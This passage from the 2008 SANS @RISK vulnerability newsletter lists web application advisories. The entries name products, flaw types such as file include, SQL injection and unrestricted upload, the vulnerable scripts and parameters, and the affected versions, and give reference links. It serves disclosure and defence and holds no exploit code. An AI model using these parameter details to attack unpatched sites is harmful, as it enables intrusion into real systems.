  • Description: Interact is a web-based platform that supports online learning. The application is exposed to multiple remote file include issues because it fails to sufficiently sanitize user-supplied input to the "CONFIG[LANGUAGE_CPATH]" parameter of the "modules/forum/embedforum.php" script and the "CONFIG[BASE_PATH]" parameter of the "modules/scorm/lib.inc.php" script. Interact version 2.4.1 is affected.
  • Ref: http://www.securityfocus.com/bid/28996
  • 08.19.68 - CVE: Not Available
  • Platform: Web Application
  • Title: VWar 1.6.1 R2 Multiple Remote Vulnerabilities
  • Description: VWar is a web-based team organizer. The application is exposed to multiple remote issues. VWar version 1.6.1 R2 is affected.
  • Ref: http://www.securityfocus.com/bid/29001
  • 08.19.69 - CVE: Not Available
  • Platform: Web Application
  • Title: vlbook Cross-Site Scripting and Local File Include Vulnerabilities
  • Description: vlbook is a web-based guestbook application. The application is exposed to multiple input validation issues. vlbook version 1.21 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491519
  • 08.19.70 - CVE: Not Available
  • Platform: Web Application
  • Title: ActualScripts ActualAnalyzer Lite "admin.php" Local File Include
  • Description: ActualAnalyzer is a web-based application that collects site statistics. The application is exposed to a local file include issue because it fails to properly sanitize user-supplied input to the "style" parameter of the "admin.php" script. ActualAnalyzer Lite version 2.78 is affected.
  • Ref: http://www.securityfocus.com/bid/29007
  • 08.19.71 - CVE: Not Available
  • Platform: Web Application
  • Title: MyKnowledgeQuest KnowledgeQuest Administration Multiple Authentication Bypass Vulnerabilities
  • Description: KnowledgeQuest is a web-based knowledgebase application. The application is exposed to multiple authentication bypass issues. The authentication process allows an attacker to bypass authentication and gain administrative access. KnowledgeQuest version 2.6 is affected.
  • Ref: http://www.securityfocus.com/bid/29012
  • 08.19.72 - CVE: Not Available
  • Platform: Web Application
  • Title: Robocode AWT Event Queue Security Bypass
  • Description: Robocode is a Java programming game. The application is exposed to a security bypass issue. Robots can access the internals of the Robocode game via specially-crafted calls to the AWT Event Queue. Robocode versions prior to 1.6.0 are affected.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=596393
  • 08.19.73 - CVE: Not Available
  • Platform: Web Application
  • Title: Project Alumni SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: Project Alumni is a web-based application to track and display school alumni. The application is exposed to a cross-site scripting issue and an SQL injection issue because it fails to sufficiently sanitize user-supplied input. Project Alumni version 1.0.9 is affected.
  • Ref: http://www.securityfocus.com/archive/1/491552
  • 08.19.74 - CVE: Not Available
  • Platform: Web Application
  • Title: Zen Cart "keyword" parameter SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: Zen Cart is a web-based calendar application. The application is exposed to a cross-site scripting issue and an SQL injection issue because the application fails to sufficiently sanitize user-supplied input to the "keyword" parameter of the "index.php" script. Zen Cart 2008 is affected.
  • Ref: http://www.securityfocus.com/bid/29020
  • 08.19.75 - CVE: Not Available
  • Platform: Web Application
  • Title: OpenAutoClassifieds Multiple SQL Injection Vulnerabilities
  • Description: OpenAutoClassifieds is a web-based classified-ads application for vehicles. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data to the following scripts and parameters: "login.php: username" and "listings.php: id". OpenAutoClassifieds version 1.4.3b is affected.
  • Ref: http://www.securityfocus.com/bid/29027
  • 08.19.76 - CVE: Not Available
  • Platform: Web Application
  • Title: iTCms "boxpop.php" Remote File Include
  • Description: iTCms is a PHP-based content manager. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "shout" parameter of the "box/minichat/boxpop.php" script. iTCms version 1.9 is affected.
  • Ref: http://www.securityfocus.com/bid/29028
  • 08.19.77 - CVE: Not Available
  • Platform: Web Application
  • Title: SiteXS CMS "upload.php" Arbitrary File Upload
  • Description: SiteXS CMS is a PHP-based content manager. The application is exposed to an issue that lets remote attackers upload and execute arbitrary script code because it fails to properly sanitize user-supplied input to the "adm/visual/upload.php" script.
  • Ref: http://www.securityfocus.com/archive/1/491578
  • 08.19.78 - CVE: Not Available
  • Platform: Web Application
  • Title: Maian Script World Multiple Scripts SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: Multiple Maian Script World products are exposed to cross-site scripting issues and SQL injection issues because the applications fail to sufficiently sanitize user-supplied input.
  • Ref: http://www.securityfocus.com/archive/1/491586
  • 08.19.79 - CVE: Not Available
  • Platform: Web Application
  • Title: cpLinks Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
  • Description: cpLinks is a grade links directory script. The application is exposed to multiple input validation issues. cpLinks version 1.03 is affected.
  • Ref: http://www.securityfocus.com/bid/29035
  • 08.19.80 - CVE: Not Available
  • Platform: Web Application
  • Title: Kmita Tellfriend "htmlcode.php" Remote File Include
  • Description: Kmita Tellfriend is a recommendation script. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "file" parameter of the "htmlcode.php" script. Kmita Tellfriend version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/29042
  • 08.19.81 - CVE: Not Available
  • Platform: Web Application
  • Title: SmartBlog Multiple Input Validation Vulnerabilities
  • Description: SmartBlog is a PHP-based weblog application. The application is exposed to multiple issues because it fails to sufficiently sanitize user-supplied data. SmartBlog version 1.3 is affected.
  • Ref: http://www.securityfocus.com/bid/29043
  • 08.19.82 - CVE: Not Available
  • Platform: Web Application
  • Title: Kmita Mail "htmlcode.php" Remote File Include
  • Description: Kmita Mail is a mail form processor. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "file" parameter of the "htmlcode.php" script. Kmita Mail version 3.0 is affected.
  • Ref: http://www.securityfocus.com/bid/29044
  • 08.19.83 - CVE: Not Available
  • Platform: Web Application
  • Title: TLM CMS "index.php" Multiple SQL Injection Vulnerabilities
  • Description: TLM CMS is a content manager. The application is exposed to multiple SQL injection issues because it fails to sufficiently sanitize user-supplied data. TLM CMS version 1.1 is affected.
  • Ref: http://www.securityfocus.com/bid/29049
  • 08.19.84 - CVE: Not Available
  • Platform: Web Application
  • Title: ScorpNews "example.php" Remote File Include
  • Description: ScorpNews is a web-based application. The application is exposed to a remote file include issue because it fails to properly sanitize user-supplied input in the "site" parameter of the "example.php" script. ScorpNews version 2.0 is affected.
  • Ref: http://www.milw0rm.com/exploits/5539
  • 08.19.85 - CVE: Not Available
  • Platform: Web Application
  • Title: DeluxeBB SQL Injection and PHP Injection Vulnerabilities
  • Description: DeluxeBB is a web-based forum. DeluxeBB is exposed to multiple issues because it fails to properly sanitize user-supplied input. DeluxeBB versions 1.2 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/29062
  • 08.19.86 - CVE: Not Available
  • Platform: Web Application
  • Title: Power Editor Multiple Input Validation Vulnerabilities
  • Description: Power Editor is a web-based application for editing files. The application is exposed to multiple input validation issues. Power Editor version 2.0 is affected.
  • Ref: http://www.securityfocus.com/bid/29063
  • 08.19.87 - CVE: Not Available
  • Platform: Web Application
  • Title: QTO File Manager "qtofm.php" Arbitrary File Upload
  • Description: QTO File Manager is a web-based file management application. The application is exposed to an issue that lets remote attackers upload and execute arbitrary script code because it fails to properly sanitize user-supplied input to the "qtofm.php" script.
  • Ref: http://www.securityfocus.com/archive/1/491699

(c) 2008. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

Subscriptions: @RISK is distributed free of charge by the SANS Institute to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.

If you want to be a technology and security leader, this is the course for you!
-Andrew Longsworth, Priscoll's

CyberTalent Assessments

Latest Whitepapers

Building and Maintaining a "Certifiable" Workforce
By Robert J. Mavretich

How Can You Build and Leverage SNORT IDS Metrics to Reduce Risk?
By Tim Proffitt

Daisy Chain Authentication
By Courtney Imbert

Latest Tweets

NEW #SANS Survey: Security Analytics & Intelligence 2nd [...]
October 1, 2013 - 6:30 PM

Tips on how to convince your boss to let you train online wi [...]
October 1, 2013 - 6:23 PM

#2 Tip on how 2 convince your boss 2 let u train online: Fle [...]
October 1, 2013 - 3:00 PM

Contact Us

(301) 654-SANS (7267)
Mon-Fri 9am - 8pm EST/EDT
info@sans.org

"It was a great learning experience that helped open my eyes wider. The instructor's knowledge was fantastic."
- Manuja Wikesekera, Melbourne Cricket Club

"Because of the use of real-world examples it's easier to apply what you learn."
- Danny Hill, Friedkin Companies, Inc.

"The amount of knowledge conveyed and technical diving by practical hands-on was well balanced."
- Aaron Moore, Maricopa County